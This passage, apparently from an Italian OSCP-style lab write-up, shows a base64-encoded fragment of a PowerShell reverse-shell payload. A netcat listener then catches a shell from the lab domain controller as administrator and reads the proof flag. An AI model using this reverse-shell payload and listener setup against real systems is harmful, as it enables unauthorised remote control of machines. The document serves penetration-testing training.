IAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==

E recupero la flag del DC:

Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE]
└─$ nc -nvlp 4477
listening on [any] 4477 ...
connect to [192.168.45.176] from (UNKNOWN) [192.168.229.158] 54985

PS C:\Users\Administrator\Documents> whoami
zeus\administrator
PS C:\Users\Administrator\Documents> cd ..\Desktop
PS C:\Users\Administrator\Desktop> type proof.txt
ab69e8ee95559ec318512d4304862125
PS C:\Users\Administrator\Desktop> ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::c758:61d8:60d:1552%12
   IPv4 Address. . . . . . . . . . . : 192.168.229.158
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.229.254
PS C:\Users\Administrator\Desktop>

Monosnap Debian 12.x 64-bit_kali 2024-12-02 01-21-59.png